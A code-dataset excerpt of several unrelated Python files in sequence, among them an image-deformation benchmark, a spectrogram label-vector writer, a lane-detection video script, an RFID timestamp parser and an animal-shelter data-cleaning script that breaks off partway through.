    # Define deformation grid
    gridX = np.arange(width, dtype=np.int16)
    gridY = np.arange(height, dtype=np.int16)
    vy, vx = np.meshgrid(gridX, gridY)
    rigid = mls_rigid_deformation(vy, vx, p, q, alpha=1)
    aug = np.ones_like(image)
    aug[vx, vy] = image[tuple(rigid)]
    return aug
def benchmark_torch(image, p, q):
    """Run one rigid MLS deformation of *image* (PyTorch path, on the
    tensor's own device) and return it."""
    height, width = image.shape[:2]
    device = image.device
    # Define deformation grid
    gridX = torch.arange(width, dtype=torch.int16).to(device)
    gridY = torch.arange(height, dtype=torch.int16).to(device)
    vy, vx = torch.meshgrid(gridX, gridY)
    rigid = mls_rigid_deformation_pt(vy, vx, p, q, alpha=1)
    aug = torch.ones_like(image).to(device)
    aug[vx.long(), vy.long()] = image[rigid[0], rigid[1]]
    return aug
def run_benckmark(i):
    """Time NumPy vs PyTorch rigid deformation for configuration *i*.

    (Name typo "benckmark" kept as-is -- callers reference it.)
    Each backend is run 3 times on random data and the mean wall time is
    printed.  Entries 1-3 of `sizes` repeat (500, 500) on purpose: they
    differ in the number of control points.
    """
    sizes = [ # (height, width)
        (100, 100),
        (500, 500),
        (500, 500),
        (500, 500),
        (1000, 1000),
        (2000, 2000),
    ]
    num_pts = [16, 16, 32, 64, 64, 64]
    times = []
    for _ in range(3):
        image = np.random.randint(0, 256, sizes[i])
        height, width = image.shape[:2]
        p = np.stack((
            np.random.randint(0, height, size=num_pts[i]),
            np.random.randint(0, width, size=num_pts[i]),
        ), axis=1)
        q = p + np.random.randint(-20, 20, size=p.shape)
        start = time.time()
        _ = benchmark_numpy(image, p, q)
        elapse = time.time() - start
        times.append(elapse)
    print("Time (numpy):", sum(times) / len(times))
    times = []
    for _ in range(3):
        image = torch.randint(0, 256, sizes[i]).to(device)
        height, width = image.shape[:2]
        p = torch.stack((
            torch.randint(0, height, size=(num_pts[i],)),
            torch.randint(0, width, size=(num_pts[i],)),
        ), dim=1).to(device)
        q = p + torch.randint(-20, 20, size=p.shape).to(device)
        start = time.time()
        _ = benchmark_torch(image, p, q)
        elapse = time.time() - start
        times.append(elapse)
    print("Time (torch):", sum(times) / len(times))
if __name__ == "__main__":
    # demo() needs images/toy.jpg on disk; uncomment the others to run them.
    demo()
    # demo2()
    # demo3()
    # demo_torch()
    # run_benckmark(i=0)
|
12,739 | ad49c2496f76f4e471583393499a1d32fc2927df | # -*- coding: utf-8 -*-
import unittest
from init_spark.spark_demo01 import rdd_key_operation
from common import spark_context as sc
class MyTestCase(unittest.TestCase):
    """Smoke test for the Spark RDD key-operation demo."""
    def test_rdd(self):
        # Run the demo, then stop the shared SparkContext; the test passes
        # as long as no exception was raised.
        rdd_key_operation()
        sc.stop()
        self.assertEqual(True, True)
if __name__ == '__main__':
    unittest.main()
|
12,740 | be9309f051c61cf0c0df1337ddbaa43950cd96f0 |
def find_a_seat(n, lst):
    """Return the index of the first row in *lst* whose occupancy is at
    most half the average group size ``n / len(lst)``; -1 when no row
    qualifies or *lst* is empty.

    Fixes: the bare ``except`` (which swallowed every error, not just the
    exhausted iterator) is narrowed to StopIteration, and the
    loop-invariant threshold is computed once.
    """
    if not lst:
        return -1
    threshold = n / len(lst) / 2
    try:
        return next(i for i, seats in enumerate(lst) if seats <= threshold)
    except StopIteration:
        return -1
|
12,741 | 012fb2203cf2ae92cbeb29462a21f6e01c06eb15 | import numpy as np
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from moviepy.editor import VideoFileClip
from IPython.display import HTML
import helper_calibration as hpcal
import helper_image as hpimg
from line import Line
import pipeline as pp
# Lane-line trackers shared across frames so the pipeline can smooth
# detections over time.
line_left = Line()
line_right = Line()
def process_image(image):
    """Annotate one video frame with detected lane lines.

    Uses the module-level Line trackers and the camera calibration
    computed below.
    """
    global line_left
    global line_right
    img = pp.pipeline(image, line_left, line_right, cal_mtx, cal_dist)
    return img
# STEP 1 camera calibration
# NOTE(review): `global` at module scope is a no-op -- cal_mtx/cal_dist are
# module globals regardless.
global cal_mtx, cal_dist
cal_mtx, cal_dist = hpcal.calibrate_camera()
# STEP 2: run the pipeline over every frame of the project video.
project_output = 'output_images/result_project_video.mp4'
clip1 = VideoFileClip("project_video.mp4")#.subclip(0,2)
project = clip1.fl_image(process_image)
project.write_videofile(project_output, audio=False)
|
12,742 | be570af62d88fc4572dec8a5c046cc19eee5069f | from glob import glob
import os
from scipy.io import loadmat
import pickle
import torch
class LabelVecWriter:
    """Generate integer label vectors for spectrograms from .mat annotations.

    Annotations are (onset, offset, label) triples.  For each uncut
    spectrogram and each of its windows, a label vector of fixed length is
    produced: every time bin takes the label that overlaps it for at least
    half the bin, otherwise the no-label symbol.

    Bug fix: extract_labelvec sorted the per-bin overlaps ASCENDING and then
    read overlaps[0] as the maximum -- it actually picked the *shortest*
    overlap, mislabelling bins covered by several annotations.  The sort is
    now descending so overlaps[0] really is the dominant overlap.
    """

    def __init__(
        self,
        annot_dir_path,
        annot_file_fmt,
        spect_file_fmt,
        labelvec_file_fmt,
        windowed_spects_dir_path,
        windowed_labelvec_dir_path,
        uncut_spects_dir_path,
        uncut_labelvec_dir_path,
        num_samples_in_window,
        num_samples_in_stride,
        samp_freq,
        labelmap,
        no_label_sym,
        labelvec_len,
    ):
        self.annot_dir_path = annot_dir_path
        self.annot_file_fmt = annot_file_fmt
        self.spect_file_fmt = spect_file_fmt
        self.labelvec_file_fmt = labelvec_file_fmt
        self.windowed_spects_dir_path = windowed_spects_dir_path
        self.windowed_labelvec_dir_path = windowed_labelvec_dir_path
        self.uncut_labelvec_dir_path = uncut_labelvec_dir_path
        self.uncut_spects_dir_path = uncut_spects_dir_path
        self.num_samples_in_window = num_samples_in_window
        self.num_samples_in_stride = num_samples_in_stride
        self.samp_freq = samp_freq
        # Mapping from label symbol -> integer class id.
        self.labelmap = labelmap
        # Symbol used for silence / unlabelled bins.
        self.no_label_sym = no_label_sym
        self.labelvec_len = labelvec_len
        # Durations (seconds) of one window and of one stride step.
        self.window_dur = self.num_samples_in_window / self.samp_freq
        self.window_stride_dur = self.num_samples_in_stride / self.samp_freq

    # LabelvecWriter entry point, main method.
    def write(self, annot_files_list=None):
        """Generate and persist label vectors for every annotation file.

        When annot_files_list is None, all *<annot_file_fmt> files in the
        annotation directory are processed; otherwise only the named files.
        """
        if annot_files_list is None:
            # Collect all annotation files from the annotation directory.
            annot_file_paths = glob(
                os.path.join(self.annot_dir_path, "*" + self.annot_file_fmt)
            )
        else:
            annot_file_paths = [self.annot_dir_path + f for f in annot_files_list]
        # Use each annotation to generate a labelvector for the matching
        # uncut spectrogram and all of its windows.
        for afp in annot_file_paths:
            # NOTE(review): "/"-splitting is POSIX-only; os.path.basename
            # would be portable.
            file_name = afp.split("/")[-1].split(self.annot_file_fmt)[0]
            # Load the hand-written annotations for this recording.
            annot_file_name = file_name + self.annot_file_fmt
            annot = self.load_annotation(annot_file_name)
            # Duration of the uncut spectrogram the annotation refers to.
            spect_file_path = (
                self.uncut_spects_dir_path + file_name + self.spect_file_fmt
            )
            spect_duration = self.load_spect_duration(spect_file_path)
            # The complete spectrogram is batched as individual windows, so
            # the uncut labelvec must be one window-length per window.
            num_unique_windows = self.load_number_unique_windows(spect_file_path)
            uncut_labelvec_len = self.labelvec_len * num_unique_windows
            # Generate the uncut labelvec over the whole recording.
            uncut_labelvec = self.extract_labelvec(
                0, spect_duration, annot, uncut_labelvec_len
            )
            # Reshape into (num_windows, labelvec_len) batches.
            batched_labelvec = self.batch_uncut_labelvec(
                uncut_labelvec, num_unique_windows
            )
            # Persist the 1D "complete" and 2D "batched" representations.
            uncut_labelvec_file_name = file_name + self.labelvec_file_fmt
            self.spect_labelvec_to_disk(
                uncut_labelvec_file_name, uncut_labelvec, batched_labelvec,
            )
            # Generate one labelvec per spectrogram window of this recording.
            spect_window_files = glob(self.windowed_spects_dir_path + file_name + "*")
            for wf in spect_window_files:
                # Precomputed window time bounds stored alongside the window.
                window_start_time, stop_time = self.load_window_times(wf)
                window_labelvec = self.extract_labelvec(
                    window_start_time, stop_time, annot, self.labelvec_len
                )
                # Preserve the window index in the output file name.
                window_number = int(wf.split(".window")[1].split(".")[0])
                window_labelvec_file_name = (
                    file_name + ".window" + str(window_number) + self.labelvec_file_fmt
                )
                self.window_labelvec_to_disk(
                    window_labelvec_file_name, window_labelvec,
                )

    def extract_labelvec(self, start, stop, annot, labelvec_len):
        """Return a torch tensor of labelvec_len integer labels covering
        [start, stop), one label per equal-duration time bin.

        A bin gets the label whose annotation overlaps it for at least half
        the bin duration; otherwise the no-label symbol.
        """
        song_dur = stop - start
        # Duration of a single label bin.
        labelbin_dur = song_dur / labelvec_len
        labelvec = []
        for i in range(labelvec_len):
            # Time bounds of the current label bin.
            idx_start = start + (i * labelbin_dur)
            idx_stop = min(idx_start + labelbin_dur, stop)
            # (overlap_duration, label) for every annotation touching the bin.
            overlaps = []
            for onset, offset, lab in annot:
                overlap_dur = self.calc_overlap_dur(
                    (onset, offset), (idx_start, idx_stop)
                )
                if overlap_dur > 0:
                    overlaps.append((overlap_dur, lab))
            # Sort by overlap duration, LONGEST first, so overlaps[0] is the
            # dominant annotation.  (The original ascending sort made the
            # "max" below actually the minimum overlap.)
            overlaps.sort(key=lambda x: x[0], reverse=True)
            if len(overlaps) == 0:
                # No annotation touches this bin: silence.
                label = self.no_label_sym
            else:
                max_overlap_dur = overlaps[0][0]
                if max_overlap_dur < (labelbin_dur / 2):
                    # Dominant overlap covers less than half the bin: silence.
                    label = self.no_label_sym
                else:
                    label = overlaps[0][1]
            integer_label = self.labelmap[label]
            labelvec.append(integer_label)
        return torch.tensor(labelvec)

    def window_labelvec_to_disk(self, file_name, labelvec):
        """Pickle a single window's labelvec into the windowed output dir."""
        file_path = self.windowed_labelvec_dir_path + file_name
        with open(file_path, "wb") as handle:
            pickle.dump(labelvec, handle)

    def spect_labelvec_to_disk(self, file_name, labelvec, batched_labelvec):
        """Pickle the uncut labelvec (1D) and its batched (2D) view."""
        file_path = self.uncut_labelvec_dir_path + file_name
        labelvec_record = {
            "complete": labelvec,
            "batched": batched_labelvec,
        }
        with open(file_path, "wb") as handle:
            pickle.dump(labelvec_record, handle)

    def batch_uncut_labelvec(self, labelvec, number_of_windows):
        """Reshape the 1D uncut labelvec into (number_of_windows, labelvec_len)."""
        return labelvec.view(number_of_windows, self.labelvec_len)

    def load_window_times(self, file_path):
        """Return the (start, stop) times stored with a spectrogram window."""
        with open(file_path, "rb") as handle:
            window_record = pickle.load(handle)
        return window_record["times"]

    def load_number_unique_windows(self, file_path):
        """Return how many windows the uncut spectrogram was batched into."""
        with open(file_path, "rb") as handle:
            spect_record = pickle.load(handle)
        batched_windows = list(spect_record["batched_windows"].values())
        samp = batched_windows[0]
        number_windows = samp.size()[0]
        return number_windows

    def load_spect_duration(self, file_path):
        """Return the recorded duration (seconds) of an uncut spectrogram."""
        with open(file_path, "rb") as handle:
            spect_record = pickle.load(handle)
        return spect_record["duration"]

    def load_annotation(self, file_name):
        """Load a .mat annotation file as a list of (onset, offset, label).

        Returns a single list for one annotation record (the common case).
        """
        annotations = []
        annot_file_path = self.annot_dir_path + file_name
        annot = loadmat(annot_file_path)
        annots = [annot]
        for a in annots:
            onsets = a["onsets"].flatten()
            offsets = a["offsets"].flatten()
            labels = [lab for lab in a["labels"][0]]
            annotations.append(list(zip(onsets, offsets, labels)))
        if len(annotations) == 1:
            return annotations[0]
        else:
            return annotations

    # Calculates overlap duration of two segments (tuples).
    def calc_overlap_dur(self, seg1, seg2):
        """Return the overlap length of intervals seg1 and seg2 (>= 0)."""
        return max(0, min(seg1[1], seg2[1]) - max(seg1[0], seg2[0]))
|
12,743 | f7337323801fea3fbbbdde49bf1b562117e88810 | from .health import HealthResource
from .google_translate import GoogleTranslate_v3 |
12,744 | a2acc3e73f50293b05ae4e85da30d5c4d25073d6 | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\packages\entosis\entosisConst.py
from carbon.common.lib.const import HOUR
# Entosis event-type identifiers.
EVENT_TYPE_TCU_DEFENSE = 1
EVENT_TYPE_IHUB_DEFENSE = 2
EVENT_TYPE_STATION_DEFENSE = 3
EVENT_TYPE_STATION_FREEPORT = 4
# Event types that benefit from the occupancy defense bonus.
EVENTS_TYPES_WITH_OCCUPANCY_BONUS = (EVENT_TYPE_TCU_DEFENSE, EVENT_TYPE_IHUB_DEFENSE, EVENT_TYPE_STATION_DEFENSE)
# Human-readable names for debug output.
EVENT_DEBUG_NAMES_BY_TYPE = {EVENT_TYPE_TCU_DEFENSE: 'TCU Defense',
 EVENT_TYPE_IHUB_DEFENSE: 'IHub Defense',
 EVENT_TYPE_STATION_DEFENSE: 'Station Defense',
 EVENT_TYPE_STATION_FREEPORT: 'Station Freeport'}
# (A second, identical set of EVENT_TYPE_* definitions was removed here --
# the module previously defined the same four constants twice.)
# Structure-update notification identifiers.
STRUCTURE_SCORE_UPDATED = 0
STRUCTURES_UPDATED = 1
# Minimum delay before a primetime (vulnerability window) change takes effect.
CHANGE_PRIMETIME_DELAY = 48 * HOUR
|
12,745 | ed0f29d05251b88b162bf9a440ace32af4de74de | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 19 22:34:55 2019
@author: bakunobu
"""
import numpy as np
N = int(input('Choose the time gap to calculate ATR: '))

# Price series: highs, lows, closes.
# NOTE(review): these are empty placeholders -- populate them with market
# data before running; with empty inputs the arithmetic below is degenerate.
h = []
l = []
close = []

# Convert the trailing N bars to numpy arrays so the elementwise
# arithmetic below works (plain Python lists do not support '-').
h = np.asarray(h[-N:], dtype=float)
l = np.asarray(l[-N:], dtype=float)
prev_close = np.asarray(close[-N - 1:-1], dtype=float)

day_diff = h - l
h_diff = h - prev_close
l_diff = prev_close - l

# True range = elementwise max of the three candidates.
# Fix: np.maximum(a, b, c) treats the THIRD positional argument as the
# `out` parameter, silently ignoring l_diff as an operand -- reduce over
# the three arrays instead.
true_range = np.maximum(np.maximum(day_diff, h_diff), l_diff)

# Wilder's smoothing: seed with the mean TR, then recurse.
atr = np.zeros(N)
atr[0] = np.mean(true_range)
for i in range(1, N):
    atr[i] = ((N - 1) * atr[i - 1] + true_range[i]) / N
|
12,746 | 96f68a1fa43daae9421fea3a893583730e1e0a63 | import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
# Revenue and cost distribution
# Yearly results: stochastic run (two scenarios stacked) vs deterministic.
data11 = pd.read_csv('Results_HPC/Results_Stochastic_yearly_HPC.csv')
data22 = pd.read_csv('Results_HPC/Results_Deterministic_yearly_HPC.csv')
data11 = data11.sort_values('scenario')
data11 = data11.reset_index(drop=True)
# First 30 rows = scenario 1, next 30 = scenario 2 (sorted by 'scenario').
data11_1 = data11.loc[0:29]
data11_2 = data11.loc[30:59]
# Revenue (positive) and cost (negated for stacked plotting) components:
# deterministic (1), scenario 1 (2), scenario 2 (3).
p1 = data22['PPA revenue']
m1 = data22['market revenue']
c1 = (data22['OpexFix'])*(-1)
o1 = (data22['OpexVar'])*(-1)
f1 = (data22['ProdCost'])*(-1)
k1 = (data22['Penalty'])*(-1)
p2 = data11_1['PPA revenue']
m2 = data11_1['market revenue']
c2 = (data11_1['OpexFix'])*(-1)
o2 = (data11_1['OpexVar'])*(-1)
f2 = (data11_1['ProdCost'])*(-1)
k2 = (data11_1['Penalty'])*(-1)
p3 = data11_2['PPA revenue']
m3 = data11_2['market revenue']
c3 = (data11_2['OpexFix'])*(-1)
o3 = (data11_2['OpexVar'])*(-1)
f3 = (data11_2['ProdCost'])*(-1)
k3 = (data11_2['Penalty'])*(-1)
x = ['Deterministic', 'Scenario 1', 'Scenario 2']
y1 = np.array([sum(p1), sum(p2), sum(p3)])
y2 = np.array([sum(m1), sum(m2), sum(m3)])
# plot bars in stack manner (revenues above zero)
plt.bar(x, y1, color='limegreen')
plt.bar(x, y2, bottom=y1, color='springgreen')
x = ['Deterministic', 'Scenario 1', 'Scenario 2']
y3 = np.array([sum(c1), sum(c2), sum(c3)])
y4 = np.array([sum(o1), sum(o2), sum(o3)])
y5 = np.array([sum(f1), sum(f2), sum(f3)])
y6 = np.array([sum(k1), sum(k2), sum(k3)])
# plot bars in stack manner (costs stack downward; values are negative)
plt.bar(x, y3, color='midnightblue')
plt.bar(x, y4, bottom=y3, color='aqua')
plt.bar(x, y5, bottom=y3 + y4, color='dimgrey')
plt.bar(x, y6, bottom=y3 + y4 + y5, color='red')
plt.ylabel("Costs and revenues [€]")
plt.legend(['Revenue from PPA', 'Revenue from market', 'Fixed opex', 'Variable opex', 'Fuel cost', 'Penalty cost'])
plt.show()
# Emissions
x = ['Deterministic', 'Scenario 1', 'Scenario 2']
y1 = np.array([sum(data22['CO2']), sum(data11_1['CO2']), sum(data11_2['CO2'])])
# plot bars in stack manner
plt.bar(x, y1, color='lightslategrey')
plt.ylabel("Tonnes of CO2")
plt.legend(['CO2 emissions'])
plt.show()
# Energy production by source (hourly data; 262800 rows per scenario)
data1 = pd.read_csv('Results_HPC/Results_Stochastic_scen3_hourly_HPC.csv')
data2 = pd.read_csv('Results_HPC/Results_Deterministic_hourly_HPC.csv')
data1 = data1.sort_values('scenario')
data1 = data1.reset_index(drop=True)
data1_1 = data1.loc[0:262799]
data1_2 = data1.loc[262800:525599]
x = ['Deterministic', 'Scenario 1', 'Scenario 2']
y1 = np.array([sum(data2['solar']), sum(data1_1['solar']), sum(data1_2['solar'])])
y2 = np.array([sum(data2['wind']), sum(data1_1['wind']), sum(data1_2['wind'])])
y3 = np.array([sum(data2['coal']), sum(data1_1['coal']), sum(data1_2['coal'])])
y4 = np.array([sum(data2['battery']), sum(data1_1['battery']), sum(data1_2['battery'])])
# plot bars in stack manner
plt.bar(x, y1, color='orangered')
plt.bar(x, y2, bottom=y1, color='dodgerblue')
plt.bar(x, y3, bottom=y1 + y2, color='darkgrey')
plt.bar(x, y4, bottom=y1 + y2 + y3, color='seagreen')
plt.ylabel("Energy [MWh]")
plt.legend(['Solar', 'Wind', 'Coal', 'Battery'])
plt.show()
|
12,747 | 36bad3528e526eee534071f668279e5ce25291b0 | """empty message
Revision ID: 15c83b7c1422
Revises: 219558c6bdf3
Create Date: 2019-03-18 06:39:54.952596
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '15c83b7c1422'
down_revision = '219558c6bdf3'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('item', sa.Column('kadaluwarsa', sa.String(length=100), nullable=True))
op.add_column('item', sa.Column('terjual', sa.Integer(), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('item', 'terjual')
op.drop_column('item', 'kadaluwarsa')
# ### end Alembic commands ###
|
12,748 | 2f7fd01e418edfce285ea3076324b78974b9d0ee | from utils import get, update, increment, decrement
|
12,749 | 6cb6466f77b818365df3a296b3a178b1c644bc0f | '''
4. Представлен список чисел.
Необходимо вывести те его элементы, значения которых больше предыдущего, например:
src = [300, 2, 12, 44, 1, 1, 4, 10, 7, 1, 78, 123, 55]
result = [12, 44, 4, 10, 78, 123]
'''
src = [300, 2, 12, 44, 1, 1, 4, 10, 7, 1, 78, 123, 55]
# Keep each element that is strictly greater than its predecessor,
# comparing neighbours pairwise instead of indexing.
result = [curr for prev, curr in zip(src, src[1:]) if curr > prev]
print(result)
|
12,750 | cad3ebd4611cc70fc517df7eeac009d0af62942b | from setuptools import setup, find_packages
import flake8diff
def read(path):
    """Return the contents of *path* decoded as UTF-8."""
    with open(path, 'rb') as handle:
        raw = handle.read()
    return raw.decode('utf-8')
# Package metadata: version/description are sourced from the flake8diff
# package itself so they stay in one place.
setup(
    name="flake8-diff",
    version=flake8diff.__version__,
    url="http://dealertrack.github.io",
    author="Dealertrack Technologies",
    author_email="gregory.armer@dealertrack.com",
    description=flake8diff.__description__,
    long_description='\n' + read('README.rst'),
    download_url=(
        'https://github.com/dealertrack/flake8-diff/releases/tag/v'
        + flake8diff.__version__
    ),
    include_package_data=True,
    packages=find_packages(),
    package_data={'flake8-diff': ['README.rst']},
    zip_safe=False,
    install_requires=[
        'flake8',
        'argparse',
        'blessings',
        'six',
    ],
    entry_points={
        'console_scripts': [
            'flake8-diff=flake8diff.main:main'
        ]
    },
    dependency_links=[]
)
|
12,751 | 8341bc7ba186d4e8b0f54258cebbcaec21bb475e |
frase_usuario = input("Introduce un texto: ")

# Count the uppercase characters in the user's text.
mayusculas = sum(1 for letra in frase_usuario if letra.isupper())

print("Hay {} mayusculas".format(mayusculas))
|
12,752 | 63561652adb990700b30a14447aa9cb6a2b5a8d8 | '''A program to split the RFID string into csv format: PIT, antenna, date, month, year, hour, minute, second
November 2018
@authors: James Eapen (jpe4)'''
import re
class Timestamp():
    """One RFID reader record, split into named fields.

    An input line like ``'011016DCB7,1,6/13/2016 9:32:35'`` is split on
    non-word characters into (pit, antenna, month, date, year, hour,
    minute, second).

    Bug fix: the empty-line branch never set ``self.timestamp``, so
    ``get_timestamp_csv()`` raised AttributeError on an empty Timestamp
    (which the ``__main__`` demo constructs).  It is now an empty list.
    """

    def __init__(self, line=''):
        if len(line) == 0:
            # Empty record: keep .timestamp defined so the accessors below
            # still work; all fields are empty strings.
            self.timestamp = []
            self.pit = ''
            self.antenna = ''
            self.month = ''
            self.date = ''
            self.year = ''
            self.hour = ''
            self.minute = ''
            self.second = ''
        else:
            # Split on any run of non-word characters (comma, slash,
            # space, colon).
            self.timestamp = re.split(r'\W+', line)
            self.pit = self.timestamp[0]
            self.antenna = self.timestamp[1]
            self.month = self.timestamp[2]
            self.date = self.timestamp[3]
            self.year = self.timestamp[4]
            self.hour = self.timestamp[5]
            self.minute = self.timestamp[6]
            self.second = self.timestamp[7]

    def __str__(self):
        # Field concatenation without separators (kept for compatibility).
        return str(self.pit + self.antenna + self.month + self.date + self.year + self.hour + self.minute + self.second)

    def get_timestamp_csv(self):
        """Return the raw split fields joined by commas ('' when empty)."""
        return str(','.join(self.timestamp))
if __name__ == '__main__':
    # Quick demo: an empty record and a parsed sample line.
    empty = Timestamp()
    bird = Timestamp('011016DCB7,1,6/13/2016 9:32:35')
    print(empty, bird)
12,753 | 1c9c1a6f0b22d6fef4587a04d7eea1c516dc439b | from __future__ import division
import sys
import numpy as np
import matplotlib.pyplot as plt
from sklearn import preprocessing
from sklearn import svm
import re
dataVectors = []
#the file train.csv is expected
file = open('train.csv','r')
for line in file:
dataVectors.append(line.strip().split(','))
file.close
#find the attribute names
attributes = dataVectors[0]
dataVectors = dataVectors[1:]
data=np.array(np.genfromtxt('train.csv',dtype=('S32','S32','S32','S32','S32','S32','S32',int,'S32','S32'),delimiter=',',names=True))
data.shape
#lets first convert all ages into days
#this code was meant to convert all data into days, we found out that was not going to work
#dateByDaysVec = []
#for i in range(len(dataVectors)):
# if "year" in dataVectors[i][7]:
# num = [int(s) for s in dataVectors[i][7].split() if s.isdigit()]
# dateByDaysVec.append(365*num[0])
# elif "month" in dataVectors[i][7]:
# num = [int(s) for s in dataVectors[i][7].split() if s.isdigit()]
# dateByDaysVec.append(30*num[0])
# elif "week" in dataVectors[i][7]:
# num = [int(s) for s in dataVectors[i][7].split() if s.isdigit()]
# dateByDaysVec.append(7*num[0])
# elif "day" in dataVectors[i][7]:
# num = [int(s) for s in dataVectors[i][7].split() if s.isdigit()]
# dateByDaysVec.append(num[0])
# else:
# dateByDaysVec.append(0)
yearsAlive = []
#assign number based on year
#less than a year 0
#every year after is another int
#convert all age data into yearly ints
for i in range(len(dataVectors)):
if "year" in dataVectors[i][7]:
num = [int(s) for s in dataVectors[i][7].split() if s.isdigit()]
yearsAlive.append(num[0])
data['AgeuponOutcome'][i] = num[0]
else:
yearsAlive.append(0)
data['AgeuponOutcome'][i] = 0
#used to show the age dataskew uncomment to see
#plt.hist(data['AgeuponOutcome'],4)
#plt.show()
#seperate age data into 3 distinct categories
idx_age_0=data['AgeuponOutcome']<5
idx_age_1=(data['AgeuponOutcome']>=5) & (data['AgeuponOutcome']<10)
idx_age_2=data['AgeuponOutcome']>=10
#save new data and reopen data with years now as strings instead of ints
np.savetxt('filterPass1.txt',data,fmt="%s",delimiter=',')
data=np.array(np.genfromtxt('filterPass1.txt',dtype=('S32','S32','S32','S32','S32','S32','S32','S32','S32','S32'),delimiter=',',names=attributes))
dataLen = len(dataVectors)
dataVectors = []
file = open('filterPass1.txt','r')
for line in file:
dataVectors.append(line.strip().split(','))
file.close()
dataLen2 = len(dataVectors)
#save new year data as easy to read strings
data['AgeuponOutcome'][idx_age_0]='<5years'
data['AgeuponOutcome'][idx_age_1]='>=5and<10years'
data['AgeuponOutcome'][idx_age_2]='>=10years'
#so seperating the animals by pairs of 5 years could work
#now we have defined two different ways to look at the amount of time the pets have been alive
#decide later what is more appropriate
#next step is to take the animals with no names and assign them "NoName"
#I will also keep track of unnamed pets vs named
listOfAnimalNames = []
unnamedVsNamed = []
for i in range(len(dataVectors)):
if dataVectors[i][1] != '':
listOfAnimalNames.append(dataVectors[i][1])
unnamedVsNamed.append('Named')
else:
listOfAnimalNames.append('NoName')
unnamedVsNamed.append('NoName')
idx_name_0 = data['Name'] != ''
idx_name_1 = data['Name'] == ''
data['Name'][idx_name_0] = "Named"
data['Name'][idx_name_1] = "NoName"
#now that names are taken care of we need to handle the DateTime data
listOfSeasons = []
listOfTimeOfDays = []
#compile the pattern once outside the loop; the raw string keeps the \d
#escapes legal (a non-raw '\d' is a deprecated/invalid escape sequence
#in modern Python)
dateTimePattern = re.compile(r'\d+-(\d+)-\d+ (\d+):\d+:\d+')
#map each record's timestamp onto a season (from the month) and a
#coarse time-of-day bucket (from the hour)
for i in range(len(dataVectors)):
    monthStr, hourStr = dateTimePattern.findall(dataVectors[i][2])[0]
    month = int(monthStr)
    time = int(hourStr)
    if month >= 3 and month <= 5:
        season = 'Spring'
    elif month >= 6 and month <= 8:
        season = 'Summer'
    elif month >= 9 and month <= 11:
        season = 'Fall'
    else:
        #months 12, 1 and 2
        season = 'Winter'
    if time >= 1 and time <= 12:
        timeOfDay = 'Morning'
    elif time >= 13 and time <= 18:
        timeOfDay = 'Afternoon'
    else:
        #hours 19-23 plus midnight (0)
        timeOfDay = 'Night'
    listOfSeasons.append(season)
    listOfTimeOfDays.append(timeOfDay)
#save new data with name modified
np.savetxt('filterPass2.txt',data,fmt="%s",delimiter=',')
#re-read the file into a plain list of row lists
dataVectors = []
file = open('filterPass2.txt','r')
for line in file:
    dataVectors.append(line.strip().split(','))
file.close()
dataLen3 = len(dataVectors)
#get rid of animalID and datetime and add timeOfDay and Seasons
#pop(2) removes the DateTime column FIRST (while it is still at index
#2), then pop(0) removes AnimalID; Seasons is inserted at index 1 and
#TimeOfDay at index 2, right after the Name column
for i in range(dataLen3):
    dataVectors[i].pop(2)
    dataVectors[i].pop(0)
    dataVectors[i].insert(1, listOfSeasons[i])
    dataVectors[i].insert(2, listOfTimeOfDays[i])
#save data with new timeOfDay and Seasons attributes
data2 = np.array(dataVectors)
np.savetxt('filterPass3.txt',data2,fmt="%s",delimiter=',')
#generate new data array from the reshaped CSV
data=np.array(np.genfromtxt('filterPass3.txt',dtype=('S32','S32','S32','S32','S32','S32','S32','S32','S32','S32'),delimiter=',',names=attributes))
#read the same file back into a plain list of row lists
dataVectors = []
file = open('filterPass3.txt','r')
for line in file:
    dataVectors.append(line.strip().split(','))
#BUG FIX: the original wrote `file.close` without parentheses, which
#never invoked the method, so the file handle was never closed
file.close()
#collapse the Breed column down to a Mix / Purebred flag; the read of
#data[i][8] happens before its rewrite within the same iteration, so a
#single fused loop is equivalent to the original two passes
isMixOrNot = []
for i in range(len(dataVectors)):
    verdict = 'Mix' if 'Mix' in data[i][8] else 'Purebred'
    isMixOrNot.append(verdict)
    data[i][8] = verdict
#np.savetxt('filterPass4.txt',data,fmt="%s",delimiter=',')
#data=np.array(np.genfromtxt('filterPass4.txt',dtype=('S32','S32','S32','S32','S32','S32','S32','S32','S32','S32'),delimiter=',',names=attributes))
#dataVectors = []
#file = open('filterPass4.txt','r')
#for line in file:
# dataVectors.append(line.strip().split(','))
#file.close
#collapse the Color column down to a MixedColor / SolidColor flag (a
#'/' in the field means more than one colour); fused read-then-write
#per row is equivalent to the original two passes
mixedColorOrNot = []
for i in range(len(dataVectors)):
    verdict = 'MixedColor' if '/' in data[i][9] else 'SolidColor'
    mixedColorOrNot.append(verdict)
    data[i][9] = verdict
#get rid of the rest of the whitespace in the data so it can be used with Association Rules
#all OutcomeSubtype masks are computed up front, BEFORE any in-place
#rewrite, so rows changed from 'In Foster' to 'Foster' cannot be
#matched a second time by the 'Foster' mask below
idx_subtype_0 = data['OutcomeSubtype'] == ''
idx_subtype_1 = data['OutcomeSubtype'] == 'At Vet'
idx_subtype_2 = data['OutcomeSubtype'] == 'Foster'
idx_subtype_3 = data['OutcomeSubtype'] == 'In Foster'
idx_subtype_4 = data['OutcomeSubtype'] == 'In Kennel'
idx_subtype_5 = data['OutcomeSubtype'] == 'In Surgery'
idx_subtype_6 = data['OutcomeSubtype'] == 'Rabies Risk'
#blank subtype becomes an explicit 'NoSubtype'; 'Foster' and
#'In Foster' are merged into a single 'Foster' bucket
data['OutcomeSubtype'][idx_subtype_0] = "NoSubtype"
data['OutcomeSubtype'][idx_subtype_1] = "AtVet"
data['OutcomeSubtype'][idx_subtype_2] = "Foster"
data['OutcomeSubtype'][idx_subtype_3] = "Foster"
data['OutcomeSubtype'][idx_subtype_4] = "Kennel"
data['OutcomeSubtype'][idx_subtype_5] = "Surgery"
data['OutcomeSubtype'][idx_subtype_6] = "RabiesRisk"
#same precompute-then-assign pattern for SexuponOutcome; a blank sex
